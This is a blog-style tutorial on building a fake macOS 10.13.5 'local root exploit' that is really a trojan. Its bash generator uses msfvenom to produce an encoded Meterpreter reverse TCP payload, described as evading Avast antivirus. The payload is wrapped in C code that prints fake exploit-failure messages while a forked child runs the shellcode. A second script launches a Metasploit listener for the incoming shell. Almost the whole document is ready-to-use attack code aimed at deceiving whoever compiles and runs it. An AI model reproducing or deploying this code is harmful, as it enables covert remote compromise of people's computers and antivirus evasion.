Creating a fake exploit for the latest High Sierra 10.13.5

Another exercise that you might find useful. Art of deception. Creating fakes. Fake exploits that exploit those who execute it. And we learn how to fork() :)

Our target will be MacOS 10.13.5, we will be using Metasploit framework and some custom C code to get the fake stuff look like an exploit failing (while in fact it spawns a reverse TCP Meterpreter shell :))

Here is my sample code generator  (Put this in metasploit path and make executable)

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo " And to get Script Kiddies infected :) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/meterpreter/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'void genlol();' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max);' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max)' >> temp.c
echo '{' >> temp.c 
echo 'int base_random = rand();' >> temp.c 
echo 'if (RAND_MAX == base_random){' >> temp.c
echo 'return random_in_range(min, max);' >> temp.c 
echo '}' >> temp.c
echo 'int range = max - min,' >> temp.c
echo 'remainder = RAND_MAX % range,' >> temp.c
echo 'bucket = RAND_MAX / range;' >> temp.c
echo 'if (base_random < RAND_MAX - remainder) {' >> temp.c
echo 'return min + base_random/bucket;' >> temp.c
echo '} else {' >> temp.c
echo 'return random_in_range (min, max);' >> temp.c
echo '}' >> temp.c
echo '}' >> temp.c
echo 'char* rev(char* str)' >> temp.c
echo '{' >> temp.c
echo 'int end=strlen(str)-1;' >> temp.c
echo 'int i;' >> temp.c
echo 'for(i=5; i<end; i++)' >> temp.c
echo '{' >> temp.c 
echo 'str[i] ^= 1;' >> temp.c
echo '}' >> temp.c
echo 'return str;' >> temp.c
echo '}' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'system ("clear");' >> temp.c
echo 'printf ("====================================\n");' >> temp.c
echo 'printf ("Local root exploit for MacOS 10.13.5\n");' >> temp.c
echo 'printf ("====================================\n");' >> temp.c
echo 'printf ("[*] Checking IOConsoleUsers\n");' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf(".");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("..");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("...");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("....");' >> temp.c
echo 'printf ("\n[*] Found IOCosoleUsers address gap!\n");' >> temp.c
echo 'printf ("\n[*] Spawning root shell\n");' >> temp.c
echo 'pid_t process_id = 0;' >> temp.c
echo 'pid_t sid = 0;' >> temp.c
echo 'process_id = fork();' >> temp.c
echo 'if (process_id < 0)' >> temp.c
echo '{' >> temp.c
echo 'printf("fork failed!\n");' >> temp.c
echo 'exit(1);' >> temp.c
echo '}' >> temp.c
echo 'if (process_id > 0)' >> temp.c
echo '{' >> temp.c
echo 'printf("[-] Exploit failed due to invalid PID %d IOConsoleUsers \n", process_id);' >> temp.c
echo 'exit(0);' >> temp.c
echo '}' >> temp.c
echo 'void *ptr = mmap(0, 0x2000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo 'printf ("\n[-] Exploit failed \n");' >> temp.c
echo '}' >> temp.c
echo 'void genlol(){' >> temp.c
echo 'int num1, num2, num3;' >> temp.c
echo 'num1=100;' >> temp.c
echo 'while (num1<=5) {' >> temp.c
echo 'num1=random_in_range(0,10000);' >> temp.c
echo 'num2=random_in_range(0,10000);' >> temp.c
echo 'num3=random_in_range(0,10000);' >> temp.c
echo 'printf ("\n[*] /bin/bash exec 0 \n");' >> temp.c
echo 'printf ("\n[*] R00t3d by 1337 h4x0rz \n");' >> temp.c
echo '}' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi

This will generate a file called osx64-payload.c with our callback Meterpreter IP and port we have chosen. Now we can present the code as super 1337 MacOS local root exploit to the script-kiddie audience (whoever writes C code will see this straight away ;) )

Once the Script-kiddie compiles the code on its latest MacOS 10.13.5 it will run/fail .. but we will get a reverse shell on our listener machine :)

Our listener code :  (place in metasploit path and make executable)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

Evil , no ?

Here is the video of the above